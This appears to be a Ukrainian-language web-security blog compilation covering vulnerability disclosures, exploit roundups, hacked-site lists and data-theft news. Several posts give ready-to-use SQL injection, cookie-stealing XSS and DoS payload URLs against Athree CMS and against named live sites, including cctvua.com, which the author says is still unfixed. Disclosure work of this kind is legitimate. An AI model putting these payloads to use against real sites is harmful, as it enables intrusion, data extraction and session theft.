Websecurity - Веб безпека

В лютому я писав про нову XSS уразливість в Drupal. І 21.02.2009 я зробив дослідження сайтів на движку Drupal, і виявив чимало сайтів на старих версіях Drupal, що мають цю дірку.

Зокрема я виявив наступні сайти з Cross-Site Scripting уразливістю: http://123teachme.com, http://pgdc.com і http://numbersusa.com (які використовують даний движок).

XSS:

http://123teachme.com

• alert(document.cookie)
• цікавий
• html включення

http://pgdc.com

• alert(document.cookie)
• цікавий
• html включення

http://numbersusa.com

• alert(document.cookie)
• цікавий
• html включення

Кіберзлочинці використовують пошуковці для поширення шкідливого ПЗ, зокрема, підроблених антивірусних продуктів: для інфікування користувачів злочинцям необхідно залучити їхню увагу до шкідливих сайтів, роз’яснює PandaLabs. Раніше користувачів затягали на шкідливі сайти за допомогою мосової розсилки спама. У цьому випадку потенційна жертва читає електронний лист, заходить по представленим у листі лінкам, після чого перенаправляється на шкідливі веб-сторінки.

У наші дні користувачі стали більш обережними при читанні спама чи листів, отриманих від незнайомих відправників, а тому ефективність традиційного способу стала знижуватися. У результаті цього злочинці стали використовувати нові, більш ефективні способи. Вони використовують інструмент Google Trends, що містить список самих популярних пошукових запитів протягом дня.

Після того, як злочинці довідаються про самі популярні пошукові запити, вони створюють блог, зміст якого наповнений словами і словосполученнями з популярних пошукових запитів. У результаті цього, використовуючи технології оптимізації сайта під пошукові запити (SEO), злочинці значно збільшують шанси блога виявитися в числі перших у результатах пошуку за даними популярним запитам.

По матеріалам http://www.klerk.ru.

P.S.

Окрім використання SEO методів, зловмисники також використовують контексну рекламу в пошуковцях, про що я писав, для заманювання на шкідливі сайти.

01.07.2008

У листопаді, 02.11.2007, я знайшов SQL DB Structure Extraction, SQL Injection, Cross-Site Scripting та Denial of Service уразливості в системі Athree CMS (Athree CMS Lite). Як раз коли виявив уразливості на www.cctvua.com, де і використовується цей движок.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

12.03.2009

SQL DB Structure Extraction:

http://site/?p=1;c=1′;s=1

SQL Injection:

http://site/?p=1;c=1;s=1%20and%20version()%3E4

http://site/?p=1;c=1%20and%20version()%3E4;s=1

http://site/?p=-1%20union%20select%20version(),1,1/*;c=1;s=1

Дві blind SQL Injection та одна звичайна SQL ін’єкція.

XSS (через SQL Injection):

http://site/?p=-1%20union%20select%20'%3Cscript%3Ealert(document.cookie)%3C/script%3E',1,1/*;c=1;s=1

DoS (через SQL Injection):

http://site/?p=1;c=1;s=-1%20or%201=1/*

http://site/?p=1%20or%201=1/*;c=1;s=1

В даній добірці експлоіти в веб додатках:

• PromoteWeb MySQL (go.php id) Remote SQL Injection Vulnerability (деталі)
• Ultimate Webboard (webboard.php Category) SQL Injection Vulnerability (деталі)
• barcodegen <= 2.0.0 (class_dir) Remote File Inclusion Vulnerability (деталі)
• Atomic Photo Album 1.1.0pre4 Blind SQL Injection Exploit (деталі)
• LanSuite 3.3.2 (fckeditor) Arbitrary File Upload Exploit (деталі)
• Atomic Photo Album 1.1.0pre4 (XSS/SQL) Remote Vulnerabilities (деталі)
• openEngine <= 2.0 beta4 Remote File Inclusion Vulnerability (деталі)
• Crux Gallery <= 1.32 Insecure Cookie Handling Vulnerability (деталі)
• openEngine 2.0 beta2 Remote File Inclusion Vulnerability (деталі)
• The Gemini Portal <= 4.7 Insecure Cookie Handling Vulnerability (деталі)
• Esqlanelapse Software Project <= 2.6.2 Insecure Cookie Handling Vuln (деталі)
• WinFTP Server 2.3.0 (NLST) Denial of Service Exploit (деталі)
• Atomic Photo Album 1.1.0pre4 Insecure Cookie Handling Vulnerability (деталі)
• Libra PHP File Manager <= 1.18 Insecure Cookie Handling Vulnerability (деталі)
• The Gemini Portal (lang) Remote File Inclusion Vulnerabilities (деталі)

У квітні, 16.04.2008, я знайшов нову Cross-Site Scripting уразливість на сайті http://www.shram.kiev.ua (на якому є й розділ про хакерство і безпеку). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на www.shram.kiev.ua.

XSS:

• alert(document.cookie)
• цікавий
• html включення

P.S.

На сайті є чимало інших уразливостей. До чого можуть призвести дірки на сайті (що мають місце на www.shram.kiev.ua тривалий час) я продемонстрував безпосередньо на даному сайті .

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

П’ятірка похаканих сайтів в Уанеті:

• http://kupislona.net (хакером Laqnes)
• http://alf.ho.ua (хакером ResisTance) - 03.02.2009, зараз сайт не працює
• http://cifrovichek.com (хакером ReSeT) - 26.02.2009, зараз сайт не працює (закритий хостером)
• http://manometr.net.ua (хакерами DaNG3R і HacK KinG) - 08.01.2009, зараз сайт вже виправлений адмінами
• http://www.club-lider.org.ua (хакерами DaNG3R і 4FF3TM3Z)

У Німеччині знову розгорівся скандал, викликаний викраденням особистих даних користувачів. На чорному ринку можна купити банківські реквізити 21 мільйона чоловік, що проживають у Німеччині. Велику БД з інформацією про банківські рахунки німецьких інтернетчиків було запропоновано придбати виданню Wirtschafts Woche за 12 мільйонів євро. Як приклад журнал одержав дані про 1,2 мільйони жителів.

За наявною інформацією, крім персональних даних, ця база містить довідки про банківські рахунки і персональні ідентифікаційні коди. Журнал надав отриману інформацію в прокуратуру. Перші сліди ведуть до маленьких call-центрів. Їхніми послугами часто користаються солідні компанії.

Від них секретна інформація про клієнтів і попадає в call-центри. Тому що платять працівникам call-центрів відносно мало, вони заробляють тим, що переписують дані на CD чи флешку, а потім продають перекупникам на чорному ринку. За матеріалами розслідування таких скандалів, більшість матеріалів були отримані з call-центрів. Тому, як правило, дуже непросто простежити, де саме відбулася крадіжка даних.

По матеріалам http://itua.info.

В даній добірці уразливості в веб додатках:

• Cisco Security Advisory: Default Passwords in the Application Velocity System (деталі)
• XOOPS Module myTopics-print SQL Injection(articleid) (деталі)
• joomla SQL Injection(com_geoboerse) (деталі)
• XOOPS Module wflinks SQL Injection(cid) (деталі)
• joomla SQL Injection(com_detail) (деталі)
• joomla SQL Injection(com_team) (деталі)
• joomla SQL Injection(com_formtool) (деталі)
• joomla SQL Injection(com_iigcatalog) (деталі)
• XOOPS Module section SQL Injection(articleid) (деталі)
• Multiple Security Vulnerabilities in Dokeos 1.8.4 (деталі)

Сьогодні була оприлюднена Cross-Site Scripting уразливість в WordPress MU. Уразливі WordPress MU 2.6.x та попередні версії (до версії 2.7).

Атака відбувається через HTTP заголовок HOST. Уразливість в profile.php де не фільтрується значення HTTP_HOST.

• Wordpress MU < 2.7 'HOST' HTTP Header XSS Vulnerability (деталі)

27.06.2008

У листопаді, 02.11.2007, я знайшов SQL DB Structure Extraction, SQL Injection, Cross-Site Scripting та Denial of Service уразливості на секюріті проекті http://www.cctvua.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

10.03.2009

SQL DB Structure Extraction

http://www.cctvua.com/?p=202989;c=1′;s=28

SQL Injection:

http://www.cctvua.com/?p=202989;c=1;s=1%20and%20version()%3E4

http://www.cctvua.com/?p=202989;c=1%20and%20version()%3E4;s=28

http://www.cctvua.com/?p=-1%20union%20select%20version(),1,1/*;c=1;s=28

Дві blind SQL Injection та одна звичайна SQL ін’єкція.

XSS (через SQL Injection):

• alert(document.cookie)
• цікавий
• html включення

DoS (через SQL Injection):

http://www.cctvua.com/?p=202989;c=1;s=-1%20or%201=1/*

http://www.cctvua.com/?p=202989%20or%201=1/*;c=1;s=28

Дані уразливості досі не виправлені.